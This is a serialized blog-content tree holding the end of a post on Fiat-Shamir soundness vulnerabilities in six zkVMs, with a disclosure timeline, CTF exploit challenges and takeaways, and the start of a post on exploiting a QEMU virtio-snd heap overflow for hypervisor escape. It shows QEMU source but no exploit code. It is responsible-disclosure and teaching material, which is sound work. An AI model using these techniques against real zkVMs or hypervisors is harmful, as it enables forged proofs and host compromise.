proof/transcript, statement data (e.g., public inputs) must still be absorbed before sampling any challenges that govern equations depending on them—and as Binius demonstrates, even transcript-centric systems can miss this.",{"type":27,"tag":26063,"props":130189,"children":130190},{},[],{"type":27,"tag":28,"props":130192,"children":130194},{"id":130193},"responsible-disclosure-timeline",[130195],{"type":33,"value":130196},"Responsible Disclosure Timeline",{"type":27,"tag":62980,"props":130198,"children":130199},{},[130200,130228],{"type":27,"tag":130201,"props":130202,"children":130203},"thead",{},[130204],{"type":27,"tag":130205,"props":130206,"children":130207},"tr",{},[130208,130213,130218,130223],{"type":27,"tag":130209,"props":130210,"children":130211},"th",{},[130212],{"type":33,"value":30481},{"type":27,"tag":130209,"props":130214,"children":130215},{},[130216],{"type":33,"value":130217},"Reported",{"type":27,"tag":130209,"props":130219,"children":130220},{},[130221],{"type":33,"value":130222},"Fixed",{"type":27,"tag":130209,"props":130224,"children":130225},{},[130226],{"type":33,"value":130227},"Response Time",{"type":27,"tag":130229,"props":130230,"children":130231},"tbody",{},[130232,130255,130276,130296,130318,130339],{"type":27,"tag":130205,"props":130233,"children":130234},{},[130235,130240,130245,130250],{"type":27,"tag":130236,"props":130237,"children":130238},"td",{},[130239],{"type":33,"value":115064},{"type":27,"tag":130236,"props":130241,"children":130242},{},[130243],{"type":33,"value":130244},"Sep 2025",{"type":27,"tag":130236,"props":130246,"children":130247},{},[130248],{"type":33,"value":130249},"Oct 3, 2025",{"type":27,"tag":130236,"props":130251,"children":130252},{},[130253],{"type":33,"value":130254},"\u003C1 week",{"type":27,"tag":130205,"props":130256,"children":130257},{},[130258,130262,130267,130272],{"type":27,"tag":130236,"props":130259,"children":130260},{},[130261],{"type":33,"value":115070},{"type":27,"tag":130236,"props":130263,"children":130264},{},[130265],{"type":33,"value":130266},"Oct 2025",{"type":27,"tag":130236,"props":130268,"children":130269},{},[130270],{"type":33,"value":130271},"Oct 24, 2025",{"type":27,"tag":130236,"props":130273,"children":130274},{},[130275],{"type":33,"value":130254},{"type":27,"tag":130205,"props":130277,"children":130278},{},[130279,130283,130287,130292],{"type":27,"tag":130236,"props":130280,"children":130281},{},[130282],{"type":33,"value":115076},{"type":27,"tag":130236,"props":130284,"children":130285},{},[130286],{"type":33,"value":130266},{"type":27,"tag":130236,"props":130288,"children":130289},{},[130290],{"type":33,"value":130291},"Oct 31, 2025",{"type":27,"tag":130236,"props":130293,"children":130294},{},[130295],{"type":33,"value":130254},{"type":27,"tag":130205,"props":130297,"children":130298},{},[130299,130303,130308,130313],{"type":27,"tag":130236,"props":130300,"children":130301},{},[130302],{"type":33,"value":115082},{"type":27,"tag":130236,"props":130304,"children":130305},{},[130306],{"type":33,"value":130307},"Nov 2025",{"type":27,"tag":130236,"props":130309,"children":130310},{},[130311],{"type":33,"value":130312},"Mar 5, 2026",{"type":27,"tag":130236,"props":130314,"children":130315},{},[130316],{"type":33,"value":130317},"~4 months",{"type":27,"tag":130205,"props":130319,"children":130320},{},[130321,130325,130330,130335],{"type":27,"tag":130236,"props":130322,"children":130323},{},[130324],{"type":33,"value":115094},{"type":27,"tag":130236,"props":130326,"children":130327},{},[130328],{"type":33,"value":130329},"Dec 2025",{"type":27,"tag":130236,"props":130331,"children":130332},{},[130333],{"type":33,"value":130334},"Dec 29, 2025",{"type":27,"tag":130236,"props":130336,"children":130337},{},[130338],{"type":33,"value":130254},{"type":27,"tag":130205,"props":130340,"children":130341},{},[130342,130346,130350,130355],{"type":27,"tag":130236,"props":130343,"children":130344},{},[130345],{"type":33,"value":115088},{"type":27,"tag":130236,"props":130347,"children":130348},{},[130349],{"type":33,"value":130307},{"type":27,"tag":130236,"props":130351,"children":130352},{},[130353],{"type":33,"value":130354},"Jan 21, 2026?",{"type":27,"tag":130236,"props":130356,"children":130357},{},[130358],{"type":33,"value":130359},"3 months",{"type":27,"tag":36,"props":130361,"children":130362},{},[130363],{"type":33,"value":130364},"All six teams were notified; responses ranged from immediate acknowledgement to delayed fix, and all reported issues have since been addressed.",{"type":27,"tag":26063,"props":130366,"children":130367},{},[],{"type":27,"tag":28,"props":130369,"children":130371},{"id":130370},"challenges",[130372],{"type":33,"value":115107},{"type":27,"tag":36,"props":130374,"children":130375},{},[130376,130378],{"type":33,"value":130377},"Do you think you have a good understanding of these bugs? We have prepared challenges to allow you to practice implementing two of these exploits. If you solve any of them, follow the instructions in the flag ",{"type":27,"tag":130379,"props":130380,"children":130381},"del",{},[130382],{"type":33,"value":130383},"the first 10 solvers will get a T-shirt.",{"type":27,"tag":36,"props":130385,"children":130386},{},[130387,130389,130442,130443,130699],{"type":33,"value":130388},"Your goal is to find a counter example of Fermat's Last Theorem, i.e you know ",{"type":27,"tag":84,"props":130390,"children":130392},{"className":130391},[11266,11267],[130393],{"type":27,"tag":207,"props":130394,"children":130396},{"className":130395},[11272],[130397],{"type":27,"tag":207,"props":130398,"children":130400},{"className":130399,"ariaHidden":11278},[11277],[130401],{"type":27,"tag":207,"props":130402,"children":130404},{"className":130403},[11283],[130405,130409,130414,130419,130423,130428,130433,130437],{"type":27,"tag":207,"props":130406,"children":130408},{"className":130407,"style":122305},[11288],[],{"type":27,"tag":207,"props":130410,"children":130412},{"className":130411},[11294,28860],[130413],{"type":33,"value":47},{"type":27,"tag":207,"props":130415,"children":130417},{"className":130416},[11404],[130418],{"type":33,"value":11407},{"type":27,"tag":207,"props":130420,"children":130422},{"className":130421,"style":11411},[11372],[],{"type":27,"tag":207,"props":130424,"children":130426},{"className":130425},[11294,28860],[130427],{"type":33,"value":10512},{"type":27,"tag":207,"props":130429,"children":130431},{"className":130430},[11404],[130432],{"type":33,"value":11407},{"type":27,"tag":207,"props":130434,"children":130436},{"className":130435,"style":11411},[11372],[],{"type":27,"tag":207,"props":130438,"children":130440},{"className":130439},[11294,28860],[130441],{"type":33,"value":10435},{"type":33,"value":116907},{"type":27,"tag":84,"props":130444,"children":130446},{"className":130445},[11266,11267],[130447],{"type":27,"tag":207,"props":130448,"children":130450},{"className":130449},[11272],[130451],{"type":27,"tag":207,"props":130452,"children":130454},{"className":130453,"ariaHidden":11278},[11277],[130455,130518,130580,130686],{"type":27,"tag":207,"props":130456,"children":130458},{"className":130457},[11283],[130459,130464,130505,130509,130514],{"type":27,"tag":207,"props":130460,"children":130463},{"className":130461,"style":130462},[11288],"height:0.8974em;vertical-align:-0.0833em;",[],{"type":27,"tag":207,"props":130465,"children":130467},{"className":130466},[11294],[130468,130473],{"type":27,"tag":207,"props":130469,"children":130471},{"className":130470},[11294,28860],[130472],{"type":33,"value":47},{"type":27,"tag":207,"props":130474,"children":130476},{"className":130475},[11309],[130477],{"type":27,"tag":207,"props":130478,"children":130480},{"className":130479},[11314],[130481],{"type":27,"tag":207,"props":130482,"children":130484},{"className":130483},[11319],[130485],{"type":27,"tag":207,"props":130486,"children":130488},{"className":130487,"style":11289},[11324],[130489],{"type":27,"tag":207,"props":130490,"children":130491},{"style":11328},[130492,130496],{"type":27,"tag":207,"props":130493,"children":130495},{"className":130494,"style":11334},[11333],[],{"type":27,"tag":207,"props":130497,"children":130499},{"className":130498},[11339,11340,11341,11342],[130500],{"type":27,"tag":207,"props":130501,"children":130503},{"className":130502},[11294,11342],[130504],{"type":33,"value":1735},{"type":27,"tag":207,"props":130506,"children":130508},{"className":130507,"style":11373},[11372],[],{"type":27,"tag":207,"props":130510,"children":130512},{"className":130511},[11378],[130513],{"type":33,"value":2227},{"type":27,"tag":207,"props":130515,"children":130517},{"className":130516,"style":11373},[11372],[],{"type":27,"tag":207,"props":130519,"children":130521},{"className":130520},[11283],[130522,130526,130567,130571,130576],{"type":27,"tag":207,"props":130523,"children":130525},{"className":130524,"style":11289},[11288],[],{"type":27,"tag":207,"props":130527,"children":130529},{"className":130528},[11294],[130530,130535],{"type":27,"tag":207,"props":130531,"children":130533},{"className":130532},[11294,28860],[130534],{"type":33,"value":10512},{"type":27,"tag":207,"props":130536,"children":130538},{"className":130537},[11309],[130539],{"type":27,"tag":207,"props":130540,"children":130542},{"className":130541},[11314],[130543],{"type":27,"tag":207,"props":130544,"children":130546},{"className":130545},[11319],[130547],{"type":27,"tag":207,"props":130548,"children":130550},{"className":130549,"style":11289},[11324],[130551],{"type":27,"tag":207,"props":130552,"children":130553},{"style":11328},[130554,130558],{"type":27,"tag":207,"props":130555,"children":130557},{"className":130556,"style":11334},[11333],[],{"type":27,"tag":207,"props":130559,"children":130561},{"className":130560},[11339,11340,11341,11342],[130562],{"type":27,"tag":207,"props":130563,"children":130565},{"className":130564},[11294,11342],[130566],{"type":33,"value":1735},{"type":27,"tag":207,"props":130568,"children":130570},{"className":130569,"style":11470},[11372],[],{"type":27,"tag":207,"props":130572,"children":130574},{"className":130573},[11475],[130575],{"type":33,"value":10380},{"type":27,"tag":207,"props":130577,"children":130579},{"className":130578,"style":11470},[11372],[],{"type":27,"tag":207,"props":130581,"children":130583},{"className":130582},[11283],[130584,130589,130630,130635,130639,130644,130649,130653,130658,130663,130667,130672,130676,130682],{"type":27,"tag":207,"props":130585,"children":130588},{"className":130586,"style":130587},[11288],"height:1.0085em;vertical-align:-0.1944em;",[],{"type":27,"tag":207,"props":130590,"children":130592},{"className":130591},[11294],[130593,130598],{"type":27,"tag":207,"props":130594,"children":130596},{"className":130595},[11294,28860],[130597],{"type":33,"value":10435},{"type":27,"tag":207,"props":130599,"children":130601},{"className":130600},[11309],[130602],{"type":27,"tag":207,"props":130603,"children":130605},{"className":130604},[11314],[130606],{"type":27,"tag":207,"props":130607,"children":130609},{"className":130608},[11319],[130610],{"type":27,"tag":207,"props":130611,"children":130613},{"className":130612,"style":11289},[11324],[130614],{"type":27,"tag":207,"props":130615,"children":130616},{"style":11328},[130617,130621],{"type":27,"tag":207,"props":130618,"children":130620},{"className":130619,"style":11334},[11333],[],{"type":27,"tag":207,"props":130622,"children":130624},{"className":130623},[11339,11340,11341,11342],[130625],{"type":27,"tag":207,"props":130626,"children":130628},{"className":130627},[11294,11342],[130629],{"type":33,"value":1735},{"type":27,"tag":207,"props":130631,"children":130633},{"className":130632},[11404],[130634],{"type":33,"value":11407},{"type":27,"tag":207,"props":130636,"children":130638},{"className":130637,"style":11411},[11372],[],{"type":27,"tag":207,"props":130640,"children":130642},{"className":130641},[11294,28860],[130643],{"type":33,"value":47},{"type":27,"tag":207,"props":130645,"children":130647},{"className":130646},[11404],[130648],{"type":33,"value":11407},{"type":27,"tag":207,"props":130650,"children":130652},{"className":130651,"style":11411},[11372],[],{"type":27,"tag":207,"props":130654,"children":130656},{"className":130655},[11294,28860],[130657],{"type":33,"value":10512},{"type":27,"tag":207,"props":130659,"children":130661},{"className":130660},[11404],[130662],{"type":33,"value":11407},{"type":27,"tag":207,"props":130664,"children":130666},{"className":130665,"style":11411},[11372],[],{"type":27,"tag":207,"props":130668,"children":130670},{"className":130669},[11294,28860],[130671],{"type":33,"value":10435},{"type":27,"tag":207,"props":130673,"children":130675},{"className":130674,"style":11470},[11372],[],{"type":27,"tag":207,"props":130677,"children":130679},{"className":130678},[11475],[130680],{"type":33,"value":130681},"≥",{"type":27,"tag":207,"props":130683,"children":130685},{"className":130684,"style":11470},[11372],[],{"type":27,"tag":207,"props":130687,"children":130689},{"className":130688},[11283],[130690,130694],{"type":27,"tag":207,"props":130691,"children":130693},{"className":130692,"style":101295},[11288],[],{"type":27,"tag":207,"props":130695,"children":130697},{"className":130696},[11294],[130698],{"type":33,"value":1651},{"type":33,"value":130700},". Good luck!",{"type":27,"tag":58,"props":130702,"children":130704},{"id":130703},"jolt",[130705],{"type":33,"value":115064},{"type":27,"tag":36,"props":130707,"children":130708},{},[130709,130711,130722,130724],{"type":33,"value":130710},"See ",{"type":27,"tag":47,"props":130712,"children":130719},{"href":130713,"target":130714,"rel":130715,"download":130718},"/posts/zkvms-unfaithful-claims/handout_jolt.tar.gz","_blank",[130716,130717],"noopener","noreferrer","handout_jolt.tar.gz",[130720],{"type":33,"value":130721},"the handout",{"type":33,"value":130723}," for the setup running on the server.\nSubmit your proof by connecting to ",{"type":27,"tag":84,"props":130725,"children":130727},{"className":130726},[],[130728],{"type":33,"value":130729},"jolt.chal.osec.io:8960",{"type":27,"tag":58,"props":130731,"children":130733},{"id":130732},"nexus-1",[130734],{"type":33,"value":115070},{"type":27,"tag":36,"props":130736,"children":130737},{},[130738,130739,130746,130747],{"type":33,"value":130710},{"type":27,"tag":47,"props":130740,"children":130744},{"href":130741,"target":130714,"rel":130742,"download":130743},"/posts/zkvms-unfaithful-claims/handout_nexus.tar.gz",[130716,130717],"handout_nexus.tar.gz",[130745],{"type":33,"value":130721},{"type":33,"value":130723},{"type":27,"tag":84,"props":130748,"children":130750},{"className":130749},[],[130751],{"type":33,"value":130752},"nexus.chal.osec.io:8950",{"type":27,"tag":36,"props":130754,"children":130755},{},[130756],{"type":33,"value":130757},"Now you should have enough margin to prove Fermat wrong.",{"type":27,"tag":26063,"props":130759,"children":130760},{},[],{"type":27,"tag":28,"props":130762,"children":130764},{"id":130763},"takeaways",[130765],{"type":33,"value":130766},"Takeaways",{"type":27,"tag":36,"props":130768,"children":130769},{},[130770],{"type":33,"value":130771},"We found critical soundness vulnerabilities in six separate zkVMs. All share the same root cause: prover-controlled values that affect verification equations were not bound to the Fiat-Shamir transcript before challenges were derived.",{"type":27,"tag":36,"props":130773,"children":130774},{},[130775],{"type":33,"value":130776},"The fix in each case is trivial—one or two lines of code. But finding the bug requires understanding the full verification flow and asking: \"What if the prover chose this value after seeing the challenges?\"",{"type":27,"tag":36,"props":130778,"children":130779},{},[130780,130785],{"type":27,"tag":12606,"props":130781,"children":130782},{},[130783],{"type":33,"value":130784},"For the ZK ecosystem:",{"type":33,"value":130786}," The Fiat-Shamir transform looks simple. Hash everything, derive challenges. In practice, \"everything\" is hard to specify when you have dozens of components, each with its own inputs and outputs, each expecting someone else to handle binding.",{"type":27,"tag":36,"props":130788,"children":130789},{},[130790],{"type":33,"value":130791},"We found six instances by examining a handful of systems. How many more exist in the dozens of zkVMs, proof systems, and recursive verifiers deployed today?",{"type":27,"tag":36,"props":130793,"children":130794},{},[130795,130800],{"type":27,"tag":12606,"props":130796,"children":130797},{},[130798],{"type":33,"value":130799},"For auditors:",{"type":33,"value":130801}," Draw the data flow. Trace the transcript. Check every prover-controlled value against when its relevant challenges are derived.",{"type":27,"tag":36,"props":130803,"children":130804},{},[130805,130810],{"type":27,"tag":12606,"props":130806,"children":130807},{},[130808],{"type":33,"value":130809},"For builders:",{"type":33,"value":130811}," Treat the transcript as a sacred ledger. When in doubt, absorb it.",{"type":27,"tag":10127,"props":130813,"children":130814},{},[130815],{"type":33,"value":10131},{"title":7,"searchDepth":244,"depth":244,"links":130817},[130818,130819,130822,130828,130829,130837,130843,130846,130847,130851],{"id":115115,"depth":244,"text":115118},{"id":115257,"depth":244,"text":115260,"children":130820},[130821],{"id":115263,"depth":270,"text":115266},{"id":115692,"depth":244,"text":115695,"children":130823},[130824,130825,130826,130827],{"id":115703,"depth":270,"text":115706},{"id":115891,"depth":270,"text":115894},{"id":119272,"depth":270,"text":119275},{"id":120486,"depth":270,"text":120489},{"id":122123,"depth":244,"text":122126},{"id":122628,"depth":244,"text":122631,"children":130830},[130831,130832,130833,130834,130835,130836],{"id":122650,"depth":270,"text":122653},{"id":123975,"depth":270,"text":115070},{"id":125111,"depth":270,"text":125114},{"id":125779,"depth":270,"text":125782},{"id":128435,"depth":270,"text":128438},{"id":128989,"depth":270,"text":115094},{"id":129918,"depth":244,"text":129921,"children":130838},[130839,130840,130841,130842],{"id":129929,"depth":270,"text":129932},{"id":130099,"depth":270,"text":130102},{"id":130123,"depth":270,"text":130126},{"id":130139,"depth":270,"text":130142},{"id":130153,"depth":244,"text":130156,"children":130844},[130845],{"id":130159,"depth":270,"text":130162},{"id":130193,"depth":244,"text":130196},{"id":130370,"depth":244,"text":115107,"children":130848},[130849,130850],{"id":130703,"depth":270,"text":115064},{"id":130732,"depth":270,"text":115070},{"id":130763,"depth":244,"text":130766},"content:blog:2026-03-03-zkvms-unfaithful-claims.md","blog/2026-03-03-zkvms-unfaithful-claims.md","blog/2026-03-03-zkvms-unfaithful-claims",{"_path":130856,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":130857,"description":130858,"date":130859,"author":12,"image":130860,"isFeatured":19,"onBlogPage":19,"tags":130862,"body":130865,"_type":10152,"_id":139181,"_source":10154,"_file":139182,"_stem":139183,"_extension":10157},"/blog/2026-03-17-virtio-snd-qemu-hypervisor-escape","From virtio-snd 0-Day to Hypervisor Escape: Exploiting QEMU with an Uncontrolled Heap Overflow","Turning an uncontrolled heap overflow into a reliable QEMU guest-to-host escape using new glibc allocator behavior and QEMU-specific heap spray techniques.","2026-03-17T12:00:00.000Z",{"src":130861,"width":17,"height":18},"/posts/virtio-snd-qemu-0day/title.png",[130863,130864],"qemu","heap-overflow",{"type":24,"children":130866,"toc":139163},[130867,130872,130877,130882,130888,130893,130898,130906,130912,130924,130928,130933,130941,130946,130952,130957,130970,131580,131615,131660,131694,131729,131864,131912,131918,131923,132677,132722,132758,132793,132858,132878,133328,133375,133378,133383,133448,133474,133496,133500,133505,133510,133516,133521,133526,133531,133537,133550,133556,133561,133569,133639,133644,133650,133663,133889,133952,133971,134353,134358,134391,134396,134672,134684,134702,134981,134993,134996,135031,135036,135042,135054,135066,135071,135076,135086,135121,135738,135770,135781,135817,135830,135836,135848,135856,135882,135887,135920,135961,135967,135986,136024,136032,136081,136086,136135,136140,136148,136235,136241,136280,136292,136300,136318,136337,136345,136357,136365,136384,136392,136403,136411,136422,136430,136443,136451,136457,136462,136475,136483,136501,136509,136521,136526,136534,136570,136603,136610,136644,136652,136657,136663,136675,136686,136965,137025,137093,137101,137135,137739,137750,137758,137764,137769,137780,138534,138567,138579,138665,138685,138894,138941,138953,138959,138978,139004,139032,139048,139108,139111,139131,139145,139149,139154,139159],{"type":27,"tag":36,"props":130868,"children":130869},{},[130870],{"type":33,"value":130871},"Heap overflows are often exploitable, but far less so when the corrupted bytes are not under your control. In many cases, that kind of bug is written off as a crash and nothing more. However, in this post we show how we turned such an overflow into a reliable QEMU guest-to-host escape by abusing new glibc allocator behavior and QEMU-specific heap spray techniques.",{"type":27,"tag":28,"props":130873,"children":130874},{"id":130863},[130875],{"type":33,"value":130876},"QEMU",{"type":27,"tag":36,"props":130878,"children":130879},{},[130880],{"type":33,"value":130881},"QEMU is a machine emulator and virtualizer that lets a host system run guest operating systems. It presents the guest with virtual hardware, while the logic backing that hardware runs inside the host-side QEMU process.",{"type":27,"tag":58,"props":130883,"children":130885},{"id":130884},"virtio-devices",[130886],{"type":33,"value":130887},"Virtio Devices",{"type":27,"tag":36,"props":130889,"children":130890},{},[130891],{"type":33,"value":130892},"For guest-to-host escape research, the interesting part of QEMU is the interface between the guest and those host-side device implementations. Every request sent by the guest is eventually parsed and handled by code running in the QEMU process. This is interesting because any unhandled edge case in the device could lead to some kind of host state corruption.",{"type":27,"tag":36,"props":130894,"children":130895},{},[130896],{"type":33,"value":130897},"At a high level, the communication between the driver running in the guest and the device running on the host is simple - the guest-side virtio driver shares requests over virtqueues, while the host-side virtio device consumes those requests, processes and returns responses.",{"type":27,"tag":36,"props":130899,"children":130900},{},[130901],{"type":27,"tag":126,"props":130902,"children":130905},{"alt":130903,"src":130904},"flowchart1","/posts/virtio-snd-qemu-0day/flowchart1.png",[],{"type":27,"tag":28,"props":130907,"children":130909},{"id":130908},"finding-a-bug",[130910],{"type":33,"value":130911},"Finding a Bug",{"type":27,"tag":36,"props":130913,"children":130914},{},[130915,130917,130923],{"type":33,"value":130916},"While looking for devices to research, we focused on ones that seemed to have received less scrutiny in the past. With that in mind, we started with the sound device ",{"type":27,"tag":84,"props":130918,"children":130920},{"className":130919},[],[130921],{"type":33,"value":130922},"virtio-snd",{"type":33,"value":1041},{"type":27,"tag":58,"props":130925,"children":130926},{"id":130922},[130927],{"type":33,"value":130922},{"type":27,"tag":36,"props":130929,"children":130930},{},[130931],{"type":33,"value":130932},"From the official documentation:",{"type":27,"tag":10222,"props":130934,"children":130935},{},[130936],{"type":27,"tag":36,"props":130937,"children":130938},{},[130939],{"type":33,"value":130940},"Virtio sound implements capture and playback from inside a guest using the configured audio backend of the host machine.",{"type":27,"tag":36,"props":130942,"children":130943},{},[130944],{"type":33,"value":130945},"Essentially, it allows software running inside the guest to interact with the host's audio stack through a paravirtualized sound device. Playback streams send guest-provided audio data to the host backend, while capture streams let the guest receive audio input from the host.",{"type":27,"tag":26163,"props":130947,"children":130949},{"id":130948},"audio-data-buffers",[130950],{"type":33,"value":130951},"Audio Data Buffers",{"type":27,"tag":36,"props":130953,"children":130954},{},[130955],{"type":33,"value":130956},"This audio data flows through buffers allocated by the host-side virtio-snd device and stored in a FIFO linked list for the corresponding stream.",{"type":27,"tag":36,"props":130958,"children":130959},{},[130960,130962,130968],{"type":33,"value":130961},"For example, the following is ",{"type":27,"tag":84,"props":130963,"children":130965},{"className":130964},[],[130966],{"type":33,"value":130967},"virtio_snd_handle_rx_xfer",{"type":33,"value":130969},", which is responsible for allocating buffers for an input audio stream:",{"type":27,"tag":101,"props":130971,"children":130973},{"code":130972,"language":10435,"meta":7,"className":23789,"style":7},"/*\n * The rx virtqueue handler. Makes the buffers available to their\n * respective streams for consumption.\n *\n * @vdev: VirtIOSound device\n * @vq: rx virtqueue\n */\nstatic void virtio_snd_handle_rx_xfer(VirtIODevice *vdev, VirtQueue *vq)\n{\n VirtQueueElement *elem;\n [...]\n\n for (;;) {\n VirtIOSoundPCMStream *stream;\n\n elem = virtqueue_pop(vq, sizeof(VirtQueueElement)); // [1]\n if (!elem) {\n break;\n }\n\n [...]\n\n WITH_QEMU_LOCK_GUARD(&stream->queue_mutex) {\n size = iov_size(elem->in_sg, elem->in_num) -\n sizeof(virtio_snd_pcm_status); // [2]\n buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer) + size);\n buffer->elem = elem;\n buffer->vq = vq;\n buffer->size = 0;\n buffer->offset = 0;\n QSIMPLEQ_INSERT_TAIL(&stream->queue, buffer, entry); // [3]\n }\n continue;\n\n [...]\n}\n\n",[130974],{"type":27,"tag":84,"props":130975,"children":130976},{"__ignoreMap":7},[130977,130984,130992,131000,131007,131015,131023,131031,131079,131086,131103,131110,131117,131129,131146,131153,131189,131209,131220,131227,131234,131242,131249,131282,131341,131359,131398,131423,131447,131475,131502,131540,131547,131559,131566,131573],{"type":27,"tag":207,"props":130978,"children":130979},{"class":209,"line":210},[130980],{"type":27,"tag":207,"props":130981,"children":130982},{"style":4647},[130983],{"type":33,"value":56604},{"type":27,"tag":207,"props":130985,"children":130986},{"class":209,"line":244},[130987],{"type":27,"tag":207,"props":130988,"children":130989},{"style":4647},[130990],{"type":33,"value":130991}," * The rx virtqueue handler. Makes the buffers available to their\n",{"type":27,"tag":207,"props":130993,"children":130994},{"class":209,"line":270},[130995],{"type":27,"tag":207,"props":130996,"children":130997},{"style":4647},[130998],{"type":33,"value":130999}," * respective streams for consumption.\n",{"type":27,"tag":207,"props":131001,"children":131002},{"class":209,"line":296},[131003],{"type":27,"tag":207,"props":131004,"children":131005},{"style":4647},[131006],{"type":33,"value":26759},{"type":27,"tag":207,"props":131008,"children":131009},{"class":209,"line":445},[131010],{"type":27,"tag":207,"props":131011,"children":131012},{"style":4647},[131013],{"type":33,"value":131014}," * @vdev: VirtIOSound device\n",{"type":27,"tag":207,"props":131016,"children":131017},{"class":209,"line":867},[131018],{"type":27,"tag":207,"props":131019,"children":131020},{"style":4647},[131021],{"type":33,"value":131022}," * @vq: rx virtqueue\n",{"type":27,"tag":207,"props":131024,"children":131025},{"class":209,"line":892},[131026],{"type":27,"tag":207,"props":131027,"children":131028},{"style":4647},[131029],{"type":33,"value":131030}," */\n",{"type":27,"tag":207,"props":131032,"children":131033},{"class":209,"line":1475},[131034,131038,131042,131047,131052,131056,131061,131066,131070,131075],{"type":27,"tag":207,"props":131035,"children":131036},{"style":214},[131037],{"type":33,"value":58283},{"type":27,"tag":207,"props":131039,"children":131040},{"style":214},[131041],{"type":33,"value":58288},{"type":27,"tag":207,"props":131043,"children":131044},{"style":1335},[131045],{"type":33,"value":131046}," virtio_snd_handle_rx_xfer",{"type":27,"tag":207,"props":131048,"children":131049},{"style":238},[131050],{"type":33,"value":131051},"(VirtIODevice ",{"type":27,"tag":207,"props":131053,"children":131054},{"style":226},[131055],{"type":33,"value":9286},{"type":27,"tag":207,"props":131057,"children":131058},{"style":220},[131059],{"type":33,"value":131060},"vdev",{"type":27,"tag":207,"props":131062,"children":131063},{"style":238},[131064],{"type":33,"value":131065},", VirtQueue ",{"type":27,"tag":207,"props":131067,"children":131068},{"style":226},[131069],{"type":33,"value":9286},{"type":27,"tag":207,"props":131071,"children":131072},{"style":220},[131073],{"type":33,"value":131074},"vq",{"type":27,"tag":207,"props":131076,"children":131077},{"style":238},[131078],{"type":33,"value":10449},{"type":27,"tag":207,"props":131080,"children":131081},{"class":209,"line":2065},[131082],{"type":27,"tag":207,"props":131083,"children":131084},{"style":238},[131085],{"type":33,"value":18158},{"type":27,"tag":207,"props":131087,"children":131088},{"class":209,"line":2092},[131089,131094,131098],{"type":27,"tag":207,"props":131090,"children":131091},{"style":238},[131092],{"type":33,"value":131093}," VirtQueueElement ",{"type":27,"tag":207,"props":131095,"children":131096},{"style":226},[131097],{"type":33,"value":9286},{"type":27,"tag":207,"props":131099,"children":131100},{"style":238},[131101],{"type":33,"value":131102},"elem;\n",{"type":27,"tag":207,"props":131104,"children":131105},{"class":209,"line":2130},[131106],{"type":27,"tag":207,"props":131107,"children":131108},{"style":238},[131109],{"type":33,"value":112006},{"type":27,"tag":207,"props":131111,"children":131112},{"class":209,"line":2168},[131113],{"type":27,"tag":207,"props":131114,"children":131115},{"emptyLinePlaceholder":19},[131116],{"type":33,"value":2062},{"type":27,"tag":207,"props":131118,"children":131119},{"class":209,"line":4095},[131120,131124],{"type":27,"tag":207,"props":131121,"children":131122},{"style":376},[131123],{"type":33,"value":10321},{"type":27,"tag":207,"props":131125,"children":131126},{"style":238},[131127],{"type":33,"value":131128}," (;;) {\n",{"type":27,"tag":207,"props":131130,"children":131131},{"class":209,"line":4103},[131132,131137,131141],{"type":27,"tag":207,"props":131133,"children":131134},{"style":238},[131135],{"type":33,"value":131136}," VirtIOSoundPCMStream ",{"type":27,"tag":207,"props":131138,"children":131139},{"style":226},[131140],{"type":33,"value":9286},{"type":27,"tag":207,"props":131142,"children":131143},{"style":238},[131144],{"type":33,"value":131145},"stream;\n",{"type":27,"tag":207,"props":131147,"children":131148},{"class":209,"line":4154},[131149],{"type":27,"tag":207,"props":131150,"children":131151},{"emptyLinePlaceholder":19},[131152],{"type":33,"value":2062},{"type":27,"tag":207,"props":131154,"children":131155},{"class":209,"line":4203},[131156,131161,131165,131170,131175,131179,131184],{"type":27,"tag":207,"props":131157,"children":131158},{"style":238},[131159],{"type":33,"value":131160}," elem ",{"type":27,"tag":207,"props":131162,"children":131163},{"style":226},[131164],{"type":33,"value":10380},{"type":27,"tag":207,"props":131166,"children":131167},{"style":1335},[131168],{"type":33,"value":131169}," virtqueue_pop",{"type":27,"tag":207,"props":131171,"children":131172},{"style":238},[131173],{"type":33,"value":131174},"(vq, ",{"type":27,"tag":207,"props":131176,"children":131177},{"style":214},[131178],{"type":33,"value":62563},{"type":27,"tag":207,"props":131180,"children":131181},{"style":238},[131182],{"type":33,"value":131183},"(VirtQueueElement));",{"type":27,"tag":207,"props":131185,"children":131186},{"style":4647},[131187],{"type":33,"value":131188}," // [1]\n",{"type":27,"tag":207,"props":131190,"children":131191},{"class":209,"line":4249},[131192,131196,131200,131204],{"type":27,"tag":207,"props":131193,"children":131194},{"style":376},[131195],{"type":33,"value":10562},{"type":27,"tag":207,"props":131197,"children":131198},{"style":238},[131199],{"type":33,"value":686},{"type":27,"tag":207,"props":131201,"children":131202},{"style":226},[131203],{"type":33,"value":27893},{"type":27,"tag":207,"props":131205,"children":131206},{"style":238},[131207],{"type":33,"value":131208},"elem) {\n",{"type":27,"tag":207,"props":131210,"children":131211},{"class":209,"line":4290},[131212,131216],{"type":27,"tag":207,"props":131213,"children":131214},{"style":376},[131215],{"type":33,"value":10588},{"type":27,"tag":207,"props":131217,"children":131218},{"style":238},[131219],{"type":33,"value":241},{"type":27,"tag":207,"props":131221,"children":131222},{"class":209,"line":4304},[131223],{"type":27,"tag":207,"props":131224,"children":131225},{"style":238},[131226],{"type":33,"value":10637},{"type":27,"tag":207,"props":131228,"children":131229},{"class":209,"line":5466},[131230],{"type":27,"tag":207,"props":131231,"children":131232},{"emptyLinePlaceholder":19},[131233],{"type":33,"value":2062},{"type":27,"tag":207,"props":131235,"children":131236},{"class":209,"line":5530},[131237],{"type":27,"tag":207,"props":131238,"children":131239},{"style":238},[131240],{"type":33,"value":131241}," [...]\n",{"type":27,"tag":207,"props":131243,"children":131244},{"class":209,"line":7900},[131245],{"type":27,"tag":207,"props":131246,"children":131247},{"emptyLinePlaceholder":19},[131248],{"type":33,"value":2062},{"type":27,"tag":207,"props":131250,"children":131251},{"class":209,"line":7909},[131252,131257,131261,131265,131269,131273,131278],{"type":27,"tag":207,"props":131253,"children":131254},{"style":1335},[131255],{"type":33,"value":131256}," 